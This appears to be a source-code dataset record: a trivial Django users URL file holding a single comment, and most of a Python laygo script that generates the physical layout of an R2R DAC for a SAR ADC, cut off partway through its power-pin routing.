| 16.571429 | 28 | 0.413793 | 26 | 116 | 1.846154 | 0.5 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263889 | 0.37931 | 116 | 6 | 29 | 19.333333 | 0.402778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.166667 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72774332c7c5af6cd4dc03d68d56962a984c8526 | 17 | py | Python | blog/users/urls.py | hyb1713296741/blog | 4daebb4c4b37c51b2cda04b94e395b7d00b29431 | [
"MIT"
] | null | null | null | blog/users/urls.py | hyb1713296741/blog | 4daebb4c4b37c51b2cda04b94e395b7d00b29431 | [
"MIT"
] | null | null | null | blog/users/urls.py | hyb1713296741/blog | 4daebb4c4b37c51b2cda04b94e395b7d00b29431 | [
"MIT"
] | null | null | null | #进行users子应用的路由视图
| 8.5 | 16 | 0.882353 | 1 | 17 | 15 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 17 | 1 | 17 | 17 | 0.9375 | 0.882353 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
72f6ab9d2e765f30fb1fe1ac289aa0ac332936e5 | 53,716 | py | Python | laygo/generators/splash/adc_sar_r2rdac_layout_generator.py | tinapiao/Software-IC-Automation | 74b23cd94aa6e4658b110e93b5deb635e014f3a6 | [
"BSD-3-Clause"
] | 26 | 2017-07-07T08:06:31.000Z | 2021-11-25T06:41:24.000Z | laygo/generators/splash/adc_sar_r2rdac_layout_generator.py | tinapiao/Software-IC-Automation | 74b23cd94aa6e4658b110e93b5deb635e014f3a6 | [
"BSD-3-Clause"
] | 9 | 2016-12-28T03:08:29.000Z | 2019-01-30T16:00:28.000Z | laygo/generators/splash/adc_sar_r2rdac_layout_generator.py | tinapiao/Software-IC-Automation | 74b23cd94aa6e4658b110e93b5deb635e014f3a6 | [
"BSD-3-Clause"
] | 10 | 2018-07-14T01:31:28.000Z | 2021-08-21T10:18:30.000Z | #!/usr/bin/python
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
"""ADC library
"""
import laygo
import numpy as np
from math import log
import yaml
import os
import laygo.GridLayoutGeneratorHelper as laygenhelper #utility functions
#import logging;logging.basicConfig(level=logging.DEBUG)
def generate_boundary(laygen, objectname_pfix, placement_grid,
devname_bottom, devname_top, devname_left, devname_right,
shape_bottom=None, shape_top=None, shape_left=None, shape_right=None,
transform_bottom=None, transform_top=None, transform_left=None, transform_right=None,
origin=np.array([0, 0])):
# generate a boundary structure to resolve boundary design rules
pg = placement_grid
# parameters
if shape_bottom == None:
shape_bottom = [np.array([1, 1]) for d in devname_bottom]
if shape_top == None:
shape_top = [np.array([1, 1]) for d in devname_top]
if shape_left == None:
shape_left = [np.array([1, 1]) for d in devname_left]
if shape_right == None:
shape_right = [np.array([1, 1]) for d in devname_right]
if transform_bottom == None:
transform_bottom = ['R0' for d in devname_bottom]
if transform_top == None:
transform_top = ['R0' for d in devname_top]
if transform_left == None:
transform_left = ['R0' for d in devname_left]
if transform_right == None:
transform_right = ['R0' for d in devname_right]
# bottom
dev_bottom = []
dev_bottom.append(laygen.place("I" + objectname_pfix + 'BNDBTM0', devname_bottom[0], pg, xy=origin,
shape=shape_bottom[0], transform=transform_bottom[0]))
for i, d in enumerate(devname_bottom[1:]):
dev_bottom.append(
laygen.relplace(name="I" + objectname_pfix + 'BNDBTM' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_bottom[-1].name,
shape=shape_bottom[i + 1], transform=transform_bottom[i + 1]))
dev_left = []
dev_left.append(laygen.relplace(name="I" + objectname_pfix + 'BNDLFT0', templatename=devname_left[0], gridname=pg,
refinstname=dev_bottom[0].name, direction='top',
shape=shape_left[0], transform=transform_left[0]))
for i, d in enumerate(devname_left[1:]):
dev_left.append(laygen.relplace(name="I" + objectname_pfix + 'BNDLFT' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_left[-1].name, direction='top',
shape=shape_left[i + 1], transform=transform_left[i + 1]))
dev_right = []
dev_right.append(laygen.relplace(name="I" + objectname_pfix + 'BNDRHT0', templatename=devname_right[0], gridname=pg,
refinstname=dev_bottom[-1].name, direction='top',
shape=shape_right[0], transform=transform_right[0]))
for i, d in enumerate(devname_right[1:]):
dev_right.append(
laygen.relplace(name="I" + objectname_pfix + 'BNDRHT' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_right[-1].name, direction='top',
shape=shape_right[i + 1], transform=transform_right[i + 1]))
dev_top = []
dev_top.append(laygen.relplace(name="I" + objectname_pfix + 'BNDTOP0', templatename=devname_top[0], gridname=pg,
refinstname=dev_left[-1].name, direction='top',
shape=shape_top[0], transform=transform_top[0]))
for i, d in enumerate(devname_top[1:]):
dev_top.append(laygen.relplace(name="I" + objectname_pfix + 'BNDTOP' + str(i + 1), templatename=d, gridname=pg,
refinstname=dev_top[-1].name,
shape=shape_top[i + 1], transform=transform_top[i + 1]))
return [dev_bottom, dev_top, dev_left, dev_right]
def create_power_pin_from_inst(laygen, layer, gridname, inst_left, inst_right):
"""create power pin"""
rvdd0_pin_xy = laygen.get_inst_pin_xy(inst_left.name, 'VDD', gridname, sort=True)
rvdd1_pin_xy = laygen.get_inst_pin_xy(inst_right.name, 'VDD', gridname, sort=True)
rvss0_pin_xy = laygen.get_inst_pin_xy(inst_left.name, 'VSS', gridname, sort=True)
rvss1_pin_xy = laygen.get_inst_pin_xy(inst_right.name, 'VSS', gridname, sort=True)
laygen.pin(name='VDD', layer=layer, xy=np.vstack((rvdd0_pin_xy[0], rvdd1_pin_xy[1])), gridname=gridname)
laygen.pin(name='VSS', layer=layer, xy=np.vstack((rvss0_pin_xy[0], rvss1_pin_xy[1])), gridname=gridname)
def generate_r2rdac_unit(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4,
m=2, m_series=4, origin=np.array([0, 0])):
"""generate clock delay """
pg = placement_grid
rg_m3m4 = routing_grid_m3m4
tgate_name = 'tgate_'+str(m)+'x'
# placement
itgate = laygen.place(name="I" + objectname_pfix + 'TG0', templatename=tgate_name,
gridname=pg, xy=origin, template_libname=templib_logic, shape=np.array([m_series,1]))
# reference coordinates
x0 = laygen.get_inst_pin_xy(itgate.name, 'VDD', rg_m2m3, index=[m_series-1, 0])[1][0]
y0 = laygen.get_inst_pin_xy(itgate.name, 'VDD', rg_m2m3, index=[m_series-1, 0])[1][1]
# internal routes
for i in range(m_series-1):
laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(itgate.name, 'O', rg_m3m4, index=[i,0])[0] - [0, i%2],
xy1=laygen.get_inst_pin_xy(itgate.name, 'I', rg_m3m4, index=[i+1,0])[0] - [0, i%2],
gridname0=rg_m3m4, via0=[0,0], via1=[0,0])
ren = laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(itgate.name, 'EN', rg_m3m4, index=[0, 0])[0] + [0, 1],
xy1=laygen.get_inst_pin_xy(itgate.name, 'EN', rg_m3m4, index=[m_series-1, 0])[0] + [0, 1],
gridname0=rg_m3m4)
renb = laygen.route(None, laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(itgate.name, 'ENB', rg_m3m4, index=[0, 0])[0] + [0, 2],
xy1=laygen.get_inst_pin_xy(itgate.name, 'ENB', rg_m3m4, index=[m_series-1, 0])[0] + [0, 2],
gridname0=rg_m3m4)
for i in range(m_series):
laygen.via(None, laygen.get_inst_pin_xy(itgate.name, 'EN', rg_m3m4, index=[i, 0])[0] + [0, 1], rg_m3m4)
laygen.via(None, laygen.get_inst_pin_xy(itgate.name, 'ENB', rg_m3m4, index=[i, 0])[0] + [0, 2], rg_m3m4)
# VDD/VSS rails
rvdd = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, y0]), xy1=np.array([x0, y0]), gridname0=rg_m2m3)
rvss = laygen.route(None, laygen.layers['metal'][2], xy0=np.array([0, 0]), xy1=np.array([x0, 0]), gridname0=rg_m2m3)
# pins
laygen.pin_from_rect('EN', laygen.layers['pin'][4], ren, rg_m3m4)
laygen.pin_from_rect('ENB', laygen.layers['pin'][4], renb, rg_m3m4)
laygen.pin_from_rect('VDD', laygen.layers['pin'][2], rvdd, rg_m2m3)
laygen.pin_from_rect('VSS', laygen.layers['pin'][2], rvss, rg_m2m3)
laygen.pin(name='I', layer=laygen.layers['pin'][3],
xy=laygen.get_inst_pin_xy(itgate.name, 'I', rg_m3m4, index=[0, 0]), gridname=rg_m3m4)
laygen.pin(name='O', layer=laygen.layers['pin'][3],
xy=laygen.get_inst_pin_xy(itgate.name, 'O', rg_m3m4, index=[m_series-1, 0]), gridname=rg_m3m4)
def generate_r2r_dac(laygen, objectname_pfix, templib_logic, placement_grid, routing_grid_m2m3, routing_grid_m3m4,
rg_m3m4_basic_thick, rg_m4m5_thick, num_bits=9, origin=np.array([0, 0])):
"""generate r2rdac """
inv_name='inv_2x'
tap_name='tap'
r2r_unit_name='r2r_dac_unit'
r2r_unit_half_name='r2r_dac_unit_half'
pg = placement_grid
rg_m2m3 = routing_grid_m2m3
rg_m3m4 = routing_grid_m3m4
# rg_m4m5 = routing_grid_m4m5
# rg_m4m5_basic_thick = routing_grid_m4m5_basic_thick
# rg_m4m5_thick = routing_grid_m4m5_thick
# rg_m5m6 = routing_grid_m5m6
# rg_m5m6_thick = routing_grid_m5m6_thick
# rg_m5m6_thick_basic = routing_grid_m5m6_thick_basic
# rg_m6m7_thick = routing_grid_m6m7_thick
#boundaries
x0=laygen.templates.get_template('capdac', workinglib).xy[1][0] - \
laygen.templates.get_template('boundary_bottomleft').xy[1][0]*2
m_bnd_float = x0 / laygen.templates.get_template('boundary_bottom').xy[1][0]
m_bnd = int(m_bnd_float)
if not m_bnd_float == m_bnd:
m_bnd += 1
devname_bnd_left = []
devname_bnd_right = []
transform_bnd_left = []
transform_bnd_right = []
num_row=num_bits*4
for i in range(num_row):
if i%2==0:
devname_bnd_left += ['nmos4_fast_left', 'pmos4_fast_left']
devname_bnd_right += ['nmos4_fast_right', 'pmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
else:
devname_bnd_left += ['pmos4_fast_left', 'nmos4_fast_left']
devname_bnd_right += ['pmos4_fast_right', 'nmos4_fast_right']
transform_bnd_left += ['R0', 'MX']
transform_bnd_right += ['R0', 'MX']
[bnd_bottom, bnd_top, bnd_left, bnd_right] = generate_boundary(laygen, objectname_pfix='BND0',
placement_grid=pg,
devname_bottom=['boundary_bottomleft',
'boundary_bottom',
'boundary_bottomright'],
shape_bottom=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_top=['boundary_topleft', 'boundary_top',
'boundary_topright'],
shape_top=[np.array([1, 1]), np.array([m_bnd, 1]),
np.array([1, 1])],
devname_left=devname_bnd_left,
transform_left=transform_bnd_left,
devname_right=devname_bnd_right,
transform_right=transform_bnd_right,
origin=np.array([0, 0]))
#Calculate layout size
array_origin = origin + laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)
tapr_origin = np.array([laygen.get_template_xy(name='capdac', gridname=pg, libname=workinglib)[0], 0]) \
+ np.array([0, laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[1]]) \
- np.array([laygen.get_template_xy(name='boundary_bottomleft', gridname=pg, libname=utemplib)[0], 0]) \
- np.array([laygen.get_template_xy(name=tap_name, gridname=pg, libname=templib_logic)[0], 0])
# placement
itapl = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=array_origin, template_libname=templib_logic))
else:
itapl.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPL'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapl[-1].name, template_libname=templib_logic, direction='top', transform=tf))
itapr = []
for i in range(num_row):
if i%2 == 0: tf='R0'
else: tf='MX'
if i == 0:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=None, xy=tapr_origin, template_libname=templib_logic))
else:
itapr.append(laygen.relplace(name="I" + objectname_pfix + 'ITAPR'+str(i), templatename=tap_name,
gridname=pg, refinstname=itapr[-1].name, template_libname=templib_logic, direction='top', transform=tf))
i2rvdd = []
for i in range(num_bits):
if i == 0:
i2rvdd.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVDD'+str(i), templatename=r2r_unit_name,
gridname=pg, refinstname=itapl[2].name, template_libname=workinglib))
else:
i2rvdd.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVDD'+str(i), templatename=r2r_unit_name,
xy=np.array([0, 3*laygen.get_template_xy(name=r2r_unit_name, gridname=pg, libname=workinglib)[1]]),
gridname=pg, refinstname=i2rvdd[-1].name, template_libname=workinglib, direction='top'))
ir = []
for i in range(num_bits):
if i == 0:
ir.append(laygen.relplace(name="I" + objectname_pfix + 'IR'+str(i), templatename=r2r_unit_name,
gridname=pg, refinstname=itapl[1].name, template_libname=workinglib, transform='MX'))
# elif i == 0:
# ir.append(laygen.relplace(name="I" + objectname_pfix + 'IR'+str(i), templatename=r2r_unit_name,
# gridname=pg, refinstname=itapl[4*(num_bits-1)+1].name, template_libname=workinglib, direction='right', transform='MX'))
else:
ir.append(laygen.relplace(name="I" + objectname_pfix + 'IR'+str(i), templatename=r2r_unit_half_name,
xy=np.array([0, 0]),
gridname=pg, refinstname=itapl[4*i+1].name, template_libname=workinglib, direction='right', transform='MX'))
i2rvss = []
for i in range(num_bits):
if i == 0:
i2rvss.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVSS'+str(i), templatename=r2r_unit_name,
gridname=pg, refinstname=itapl[0].name, template_libname=workinglib))
else:
i2rvss.append(laygen.relplace(name="I" + objectname_pfix + 'I2RVSS'+str(i), templatename=r2r_unit_name,
xy=np.array([0, 3*laygen.get_template_xy(name=r2r_unit_name, gridname=pg, libname=workinglib)[1]]),
gridname=pg, refinstname=i2rvss[-1].name, template_libname=workinglib, direction='top'))
ibuf0 = []
ibuf1 = []
for i in range(num_bits):
if i == 0:
ibuf0.append(laygen.relplace(name="I" + objectname_pfix + 'IBUF0'+str(i), templatename=inv_name,
gridname=pg, refinstname=itapl[3].name, template_libname=logictemplib, transform='MX'))
else:
ibuf0.append(laygen.relplace(name="I" + objectname_pfix + 'IBUF0'+str(i), templatename=inv_name,
xy=np.array([0, 3*laygen.get_template_xy(name=inv_name, gridname=pg, libname=logictemplib)[1]]),
gridname=pg, refinstname=ibuf0[-1].name, template_libname=logictemplib, direction='top', transform='MX'))
ibuf1.append(laygen.relplace(name="I" + objectname_pfix + 'IBUF1'+str(i), templatename=inv_name,
gridname=pg, refinstname=ibuf0[-1].name, template_libname=logictemplib, transform='MX'))
# Space calculation
space_name = 'space_1x'
space4x_name = 'space_4x'
space_width = laygen.get_template_xy(name = space_name, gridname = pg, libname = templib_logic)[0]
space4_width = laygen.get_template_xy(name = space4x_name, gridname = pg, libname = templib_logic)[0]
blank_2r = laygen.get_inst_xy(itapr[0].name, pg)[0] - laygen.get_inst_bbox(i2rvdd[0].name, pg)[1][0]
blank_r = laygen.get_inst_xy(itapr[1].name, pg)[0] - laygen.get_inst_bbox(ir[1].name, pg)[1][0]
blank_buf = laygen.get_inst_xy(itapr[0].name, pg)[0] - laygen.get_inst_bbox(ibuf1[0].name, pg)[1][0]
m_sp4x_2r = int(blank_2r/space4_width)
m_sp1x_2r = int(blank_2r/space_width)-4*m_sp4x_2r
m_sp4x_r = int(blank_r/space4_width)
m_sp1x_r = int(blank_r/space_width)-4*m_sp4x_r
m_sp4x_buf = int(blank_buf/space4_width)
m_sp1x_buf = int(blank_buf/space_width)-4*m_sp4x_buf
isp_2rvdd_4x = []
isp_2rvss_4x = []
isp_r_4x = []
isp_buf_4x = []
isp_2rvdd_1x = []
isp_2rvss_1x = []
isp_r_1x = []
isp_buf_1x = []
for i in range(num_bits):
isp_2rvdd_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVDD_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=i2rvdd[i].name, template_libname=logictemplib, shape=[m_sp4x_2r, 1], transform='R0'))
isp_2rvdd_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVDD_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_2rvdd_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_2r, 1], transform='R0'))
isp_2rvss_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVSS_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=i2rvss[i].name, template_libname=logictemplib, shape=[m_sp4x_2r, 1], transform='R0'))
isp_2rvss_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SP2RVSS_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_2rvss_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_2r, 1], transform='R0'))
if i==0:
isp_r_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_4x' + str(i), templatename=space4x_name,
gridname=pg, refinstname=ir[i].name, template_libname=logictemplib,
shape=[m_sp4x_2r, 1], transform='MX'))
isp_r_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_1x' + str(i), templatename=space_name,
gridname=pg, refinstname=isp_r_4x[i].name, template_libname=logictemplib,
shape=[m_sp1x_2r, 1], transform='MX'))
else:
isp_r_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=ir[i].name, template_libname=logictemplib, shape=[m_sp4x_r, 1], transform='MX'))
isp_r_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SPR_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_r_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_r, 1], transform='MX'))
isp_buf_4x.append(laygen.relplace(name="I" + objectname_pfix + 'SPBUF_4x'+str(i), templatename=space4x_name,
gridname=pg, refinstname=ibuf1[i].name, template_libname=logictemplib, shape=[m_sp4x_buf, 1], transform='MX'))
isp_buf_1x.append(laygen.relplace(name="I" + objectname_pfix + 'SPBUF_1x'+str(i), templatename=space_name,
gridname=pg, refinstname=isp_buf_4x[i].name, template_libname=logictemplib, shape=[m_sp1x_buf, 1], transform='MX'))
# internal pins
pdict = laygen.get_inst_pin_xy(None, None, rg_m3m4)
# routing
# 2RVDD to VDD & 2RVSS to VSS
for i in range(num_bits):
rh0, rv0 = laygen.route_hv(laygen.layers['metal'][2], laygen.layers['metal'][3],
xy0=laygen.get_inst_pin_xy(i2rvdd[i].name, 'VDD', rg_m2m3)[0],
xy1=laygen.get_inst_pin_xy(i2rvdd[i].name, 'I', rg_m2m3)[0], gridname0=rg_m2m3)
rh0, rv0 = laygen.route_hv(laygen.layers['metal'][2], laygen.layers['metal'][3],
xy0=laygen.get_inst_pin_xy(i2rvss[i].name, 'VSS', rg_m2m3)[0],
xy1=laygen.get_inst_pin_xy(i2rvss[i].name, 'I', rg_m2m3)[0], gridname0=rg_m2m3)
x1 = laygen.get_inst_xy(ir[i].name, rg_m3m4)[0]
for i in range(num_bits):
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(i2rvdd[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[2,0],
laygen.get_inst_pin_xy(ir[i].name, 'EN', rg_m3m4)[0][1] + 6, rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
if i == num_bits-1:
laygen.pin_from_rect('out', laygen.layers['pin'][4], rh0, rg_m3m4)
[rv0, rh0, rv1] = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(i2rvss[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[2,0],
laygen.get_inst_pin_xy(ir[i].name, 'EN', rg_m3m4)[0][1] - 6, rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.route(None, laygen.layers['metal'][4], xy0=laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[0,2],
xy1=laygen.get_inst_pin_xy(ir[i].name, 'I', rg_m4m5)[0]+[2,2], gridname0=rg_m3m4, gridname1=rg_m4m5,via0=[0,0], via1=[0,0])
y1 = laygen.get_inst_pin_xy(ir[i].name, 'VDD', rg_m3m4)[0][1]+2
# R path routing
if not i == 0:
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i-1].name, 'I', rg_m4m5)[0]-[2,-6],
y1, rg_m3m4, layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ir[i-1].name, 'I', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i-1].name, 'I', rg_m4m5)[0]-[2,-6],
laygen.get_inst_pin_xy(ir[i - 1].name, 'I', rg_m3m4)[0][1]+2, rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
else:
# rh0, rv0 = laygen.route_hv(laygen.layers['metal'][2], laygen.layers['metal'][3],
# xy0=laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m2m3)[0],
# xy1=laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m2m3)[0], gridname0=rg_m2m3)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m3m4)[0],
laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m3m4)[1],
laygen.get_inst_pin_xy(ir[i].name, 'O', rg_m3m4)[0][1]-1, rg_m3m4)
laygen.via(None, xy=laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m2m3)[1], gridname=rg_m2m3)
# R EN/ENB
rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][2],
xy0=laygen.get_inst_pin_xy(ir[i].name, 'EN', rg_m2m3)[1],
xy1=laygen.get_inst_pin_xy(ir[i].name, 'VDD', rg_m2m3)[0], gridname0=rg_m2m3)
rv0, rh0 = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][2],
xy0=laygen.get_inst_pin_xy(ir[i].name, 'ENB', rg_m2m3)[1],
xy1=laygen.get_inst_pin_xy(ir[i].name, 'VSS', rg_m2m3)[0], gridname0=rg_m2m3)
# 2R EN/ENB
x_en = laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0][0]+4
x_enb = laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0][0]+2
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0],
np.array([x_en, laygen.get_inst_pin_xy(i2rvdd[i].name, 'EN', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[1][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_en, laygen.get_inst_pin_xy(i2rvdd[i].name, 'EN', rg_m4m5)[0][1]]), gridname=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[0],
np.array([x_en, laygen.get_inst_pin_xy(i2rvss[i].name, 'ENB', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf1[i].name, 'O', rg_m3m4)[1][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_en, laygen.get_inst_pin_xy(i2rvss[i].name, 'ENB', rg_m4m5)[0][1]]), gridname=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0],
np.array([x_enb, laygen.get_inst_pin_xy(i2rvdd[i].name, 'ENB', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_enb, laygen.get_inst_pin_xy(i2rvdd[i].name, 'ENB', rg_m4m5)[0][1]]), gridname=rg_m4m5)
rv0, rh0, rv1 = laygen.route_vhv(laygen.layers['metal'][3], laygen.layers['metal'][4],
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0],
np.array([x_enb, laygen.get_inst_pin_xy(i2rvss[i].name, 'EN', rg_m4m5)[0][1]]),
laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0][1], rg_m3m4,
layerv1=laygen.layers['metal'][5], gridname1=rg_m4m5)
laygen.via(None, xy=np.array([x_enb, laygen.get_inst_pin_xy(i2rvss[i].name, 'EN', rg_m4m5)[0][1]]), gridname=rg_m4m5)
# buffer routing
laygen.route(None, laygen.layers['metal'][4], xy0=laygen.get_inst_pin_xy(ibuf0[i].name, 'O', rg_m3m4)[0],
xy1=laygen.get_inst_pin_xy(ibuf1[i].name, 'I', rg_m3m4)[0], gridname0=rg_m3m4, via0=[0,0], via1=[0,0])
# Sel pins
rv0, rsel = laygen.route_vh(laygen.layers['metal'][3], laygen.layers['metal'][4],
xy0=laygen.get_inst_pin_xy(ibuf0[i].name, 'I', rg_m3m4)[0],
xy1=laygen.get_inst_pin_xy(ibuf0[i].name, 'I', rg_m3m4)[0]+[4,2], gridname0=rg_m3m4)
laygen.pin_from_rect('SEL<'+str(i)+'>', laygen.layers['pin'][4], rsel, rg_m3m4)
# # power
# for i in range(num_row):
# laygen.pin(name='VSS'+str(i), layer=laygen.layers['pin'][2], xy=laygen.get_inst_pin_xy(itapl[i].name, 'VSS', rg_m2m3),
# gridname=rg_m2m3, netname='VSS:')
# laygen.pin(name='VDD'+str(i), layer=laygen.layers['pin'][2], xy=laygen.get_inst_pin_xy(itapl[i].name, 'VDD', rg_m2m3),
# gridname=rg_m2m3, netname='VDD:')
# power pin
pwr_dim=laygen.get_template_xy(name=itapl[0].cellname, gridname=rg_m2m3, libname=itapl[0].libname)
rvddl_m3 = []
rvssl_m3 = []
rvddr_m3 = []
rvssr_m3 = []
for i in range(0, int(pwr_dim[0]/2)):
rvddl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+1, 0]), xy1=np.array([2*i+1, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
refinstname1=itapl[num_row-1].name, refpinname1='VSS', refinstindex1=np.array([0, 0])))
rvssl_m3.append(laygen.route(None, laygen.layers['metal'][3], xy0=np.array([2*i+2, 0]), xy1=np.array([2*i+2, 0]), gridname0=rg_m2m3,
refinstname0=itapl[0].name, refpinname0='VSS', refinstindex0=np.array([0, 0]),
